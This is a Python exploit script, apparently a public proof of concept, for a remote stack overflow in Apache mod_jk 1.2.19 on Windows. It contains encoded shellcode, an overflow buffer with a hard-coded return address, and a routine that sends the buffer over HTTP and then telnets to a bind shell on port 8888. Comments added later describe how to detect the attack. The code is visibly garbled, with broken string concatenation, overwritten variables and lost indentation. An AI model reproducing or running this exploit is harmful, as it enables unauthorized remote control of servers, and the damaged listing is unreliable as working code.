#!/usr/bin/python
#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ \\| _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# \\_____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# – — —– — — — —- — — –
# http://www.chroot.org
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | \\| |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| \\____|____|_|\\__|
# http://www.hitcon.org
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: irc.chroot.org #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: http://tomcat.apache.org/
#
# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# usage: ./apx-jk_mod-1.2.19 <host>
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# [ ] connecting to 192.168.1.78 …
#
# Trying 192.168.1.78…
# Connected to 192.168.1.78.
# Escape character is '^]'.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\\AppServ\\Apache2>
#
#
import os, sys, time
from socket import *
# Payload bytes, written as a run of escaped byte strings (apparently x86
# machine code for the Win32 builds named in the header). What the bytes do at
# runtime is not recoverable from this listing; the telnet transcript in the
# header and the final step of xpl() suggest they expose a cmd.exe shell on
# TCP/8888 of the target — unverified.
# NOTE(review): this run is extraction-damaged and the file's quoting is
# garbled throughout, so it is kept verbatim here rather than repaired.
shellcode = "\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49"
shellcode = "\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x68"
shellcode = "\\x58\\x30\\x41\\x31\\x50\\x42\\x41\\x6b\\x42\\x41\\x78\\x42\\x32\\x42\\x41\\x32"
shellcode = "\\x41\\x41\\x30\\x41\\x41\\x58\\x38\\x42\\x42\\x50\\x75\\x4b\\x59\\x49\\x6c\\x43"
shellcode = "\\x5a\\x7a\\x4b\\x32\\x6d\\x5a\\x48\\x5a\\x59\\x69\\x6f\\x4b\\x4f\\x39\\x6f\\x71"
shellcode = "\\x70\\x6e\\x6b\\x62\\x4c\\x44\\x64\\x71\\x34\\x4c\\x4b\\x62\\x65\\x75\\x6c\\x4c"
shellcode = "\\x4b\\x63\\x4c\\x76\\x65\\x70\\x78\\x35\\x51\\x48\\x6f\\x6c\\x4b\\x50\\x4f\\x74"
shellcode = "\\x58\\x6e\\x6b\\x33\\x6f\\x55\\x70\\x37\\x71\\x48\\x6b\\x57\\x39\\x6c\\x4b\\x66"
shellcode = "\\x54\\x6e\\x6b\\x46\\x61\\x7a\\x4e\\x47\\x41\\x6b\\x70\\x7a\\x39\\x4c\\x6c\\x4c"
shellcode = "\\x44\\x6f\\x30\\x62\\x54\\x44\\x47\\x38\\x41\\x4b\\x7a\\x54\\x4d\\x44\\x41\\x4b"
shellcode = "\\x72\\x78\\x6b\\x39\\x64\\x35\\x6b\\x53\\x64\\x75\\x74\\x46\\x48\\x72\\x55\\x79"
shellcode = "\\x75\\x6c\\x4b\\x53\\x6f\\x76\\x44\\x44\\x41\\x48\\x6b\\x35\\x36\\x4e\\x6b\\x54"
shellcode = "\\x4c\\x30\\x4b\\x6c\\x4b\\x51\\x4f\\x65\\x4c\\x65\\x51\\x38\\x6b\\x77\\x73\\x36"
shellcode = "\\x4c\\x4e\\x6b\\x6e\\x69\\x30\\x6c\\x66\\x44\\x45\\x4c\\x30\\x61\\x69\\x53\\x30"
shellcode = "\\x31\\x79\\x4b\\x43\\x54\\x6c\\x4b\\x63\\x73\\x44\\x70\\x4e\\x6b\\x77\\x30\\x66"
shellcode = "\\x6c\\x6c\\x4b\\x72\\x50\\x45\\x4c\\x4c\\x6d\\x4e\\x6b\\x73\\x70\\x64\\x48\\x73"
shellcode = "\\x6e\\x55\\x38\\x6e\\x6e\\x32\\x6e\\x34\\x4e\\x58\\x6c\\x62\\x70\\x39\\x6f\\x6b"
shellcode = "\\x66\\x70\\x66\\x61\\x43\\x52\\x46\\x71\\x78\\x30\\x33\\x55\\x62\\x63\\x58\\x63"
shellcode = "\\x47\\x34\\x33\\x65\\x62\\x41\\x4f\\x30\\x54\\x39\\x6f\\x4a\\x70\\x52\\x48\\x5a"
shellcode = "\\x6b\\x38\\x6d\\x6b\\x4c\\x75\\x6b\\x30\\x50\\x6b\\x4f\\x6e\\x36\\x53\\x6f\\x6f"
shellcode = "\\x79\\x4a\\x45\\x32\\x46\\x6f\\x71\\x6a\\x4d\\x34\\x48\\x77\\x72\\x73\\x65\\x73"
shellcode = "\\x5a\\x37\\x72\\x69\\x6f\\x58\\x50\\x52\\x48\\x4e\\x39\\x76\\x69\\x4a\\x55\\x4c"
shellcode = "\\x6d\\x32\\x77\\x69\\x6f\\x59\\x46\\x50\\x53\\x43\\x63\\x41\\x43\\x70\\x53\\x70"
shellcode = "\\x53\\x43\\x73\\x50\\x53\\x62\\x63\\x70\\x53\\x79\\x6f\\x6a\\x70\\x35\\x36\\x61"
shellcode = "\\x78\\x71\\x32\\x78\\x38\\x71\\x76\\x30\\x53\\x4b\\x39\\x69\\x71\\x4d\\x45\\x33"
shellcode = "\\x58\\x6c\\x64\\x47\\x6a\\x74\\x30\\x5a\\x67\\x43\\x67\\x79\\x6f\\x39\\x46\\x32"
shellcode = "\\x4a\\x56\\x70\\x66\\x31\\x76\\x35\\x59\\x6f\\x58\\x50\\x32\\x48\\x4d\\x74\\x4e"
shellcode = "\\x4d\\x66\\x4e\\x7a\\x49\\x50\\x57\\x6b\\x4f\\x6e\\x36\\x46\\x33\\x56\\x35\\x39"
shellcode = "\\x6f\\x78\\x50\\x33\\x58\\x6b\\x55\\x51\\x59\\x4e\\x66\\x50\\x49\\x51\\x47\\x39"
shellcode = "\\x6f\\x48\\x56\\x32\\x70\\x32\\x74\\x62\\x74\\x46\\x35\\x4b\\x4f\\x38\\x50\\x6e"
shellcode = "\\x73\\x55\\x38\\x4d\\x37\\x71\\x69\\x69\\x56\\x71\\x69\\x61\\x47\\x6b\\x4f\\x6e"
shellcode = "\\x36\\x36\\x35\\x79\\x6f\\x6a\\x70\\x55\\x36\\x31\\x7a\\x71\\x74\\x32\\x46\\x51"
shellcode = "\\x78\\x52\\x43\\x70\\x6d\\x4f\\x79\\x4d\\x35\\x72\\x4a\\x66\\x30\\x42\\x79\\x64"
shellcode = "\\x69\\x7a\\x6c\\x4b\\x39\\x48\\x67\\x62\\x4a\\x57\\x34\\x4f\\x79\\x6d\\x32\\x37"
shellcode = "\\x41\\x6b\\x70\\x7a\\x53\\x6e\\x4a\\x69\\x6e\\x32\\x62\\x46\\x4d\\x6b\\x4e\\x70"
shellcode = "\\x42\\x44\\x6c\\x4c\\x53\\x6e\\x6d\\x31\\x6a\\x64\\x78\\x4c\\x6b\\x4e\\x4b\\x4e"
shellcode = "\\x4b\\x43\\x58\\x70\\x72\\x69\\x6e\\x6d\\x63\\x37\\x66\\x79\\x6f\\x63\\x45\\x73"
shellcode = "\\x74\\x4b\\x4f\\x7a\\x76\\x63\\x6b\\x31\\x47\\x72\\x72\\x41\\x41\\x50\\x51\\x61"
shellcode = "\\x41\\x70\\x6a\\x63\\x31\\x41\\x41\\x46\\x31\\x71\\x45\\x51\\x41\\x4b\\x4f\\x78"
shellcode = "\\x50\\x52\\x48\\x4c\\x6d\\x79\\x49\\x54\\x45\\x38\\x4e\\x53\\x63\\x6b\\x4f\\x6e"
shellcode = "\\x36\\x30\\x6a\\x49\\x6f\\x6b\\x4f\\x70\\x37\\x4b\\x4f\\x4e\\x30\\x4e\\x6b\\x30"
shellcode = "\\x57\\x69\\x6c\\x6b\\x33\\x4b\\x74\\x62\\x44\\x79\\x6f\\x6b\\x66\\x66\\x32\\x6b"
shellcode = "\\x4f\\x4e\\x30\\x53\\x58\\x58\\x70\\x4e\\x6a\\x55\\x54\\x41\\x4f\\x52\\x73\\x4b"
shellcode = "\\x4f\\x69\\x46\\x4b\\x4f\\x6e\\x30\\x68";
# Layout constants for the overflow buffer that xpl() sends. buf_base bounds
# the padding computation below; foo_base and buf_offset size the padding
# placed around the payload.
# NOTE(review): the two `buf` expressions are extraction-damaged (operators
# lost, a non-ASCII dash where a minus belongs); they are left unrepaired.
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
# Single NOP byte, repeated wherever padding is needed.
nop = "\\x90"
# Hard-coded 4-byte return address. Presumably valid only for the exact Win32
# Apache/mod_jk builds listed in the header; a fixed address like this is what
# makes the payload build-specific rather than general.
ret = "\\xcc\\x2a\\xd9\\x77"
buf = nop*foo_base shellcode nop*(buf_base – foo_base – len(shellcode) – buf_offset) ret
# Short stub (11 bytes) followed by further NOP padding.
buf = "\\x90\\x90\\xb0\\x53\\x6b\\xC0\\x28\\x03\\xd8\\xff\\xd3" nop*(buf_offset – foo_base – 3)
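def usage():
    """Print the command-line usage line to stdout and exit with status -1.

    Reads ``sys.argv[0]`` for the program name. Called from the ``__main__``
    block when no host argument was supplied; it never returns because
    ``sys.exit`` raises ``SystemExit``.
    """
    # Single-argument print() parses identically under Python 2 and 3, so this
    # stays compatible with the rest of this (Python 2 era) file.
    print('usage: %s <host>\n' % sys.argv[0])
    sys.exit(-1)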
def xpl():
# Send the module-level overflow buffer `buf` as the request-target of a plain
# HTTP GET to <host>:80, wait three seconds, then hand the terminal to
# `telnet <host> 8888`. `host` is a module global set in the __main__ block.
# NOTE(review): this function is extraction-damaged (string operators and
# quote characters lost), so it is not runnable as printed and is
# deliberately left unrepaired here.
# Detection note: on the wire this is a GET whose request-target is several
# kilobytes of mostly non-printable bytes, followed by an `HTTP/1.0` request
# line tail, a `Host:` header and a trailing NUL byte after the header block.
# Request-line length and non-ASCII-in-URI rules at the web server or a WAF
# are the natural signal. Host-side, the transcript in the file header shows
# a cmd.exe prompt reached over TCP/8888, so an httpd worker accepting on
# that port, or cmd.exe spawned under httpd, would be the indicator.
try:
# Length of the buffer actually sent; useful when correlating with logs.
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf \’HTTP/1.0\\r\\nHost: %s\\r\\n\\r\\n\\0\’ % host
s.send(\’GET /\’ payload)
s.close()
print \’ [ ] connecting to %s …\\n\’ % host
time.sleep(3)
# `host` comes straight from argv and is interpolated unquoted into a shell
# command line.
os.system("telnet %s 8888" % host)
# Bare except: any failure (name resolution, refused connection, send error)
# collapses into the one message below, so the real cause is hidden.
except:
print \’ [-] EXPLOIT FAILED!\\n\’
if __name__ == \’__main__\’:
# Entry point: print the banner, take the single positional argument as the
# target host (bound as a module global that xpl() reads), and run xpl().
# With no argument, usage() prints help and exits before xpl() is reached.
print \’Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\\n\’
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use it for illegal purposes. !!
#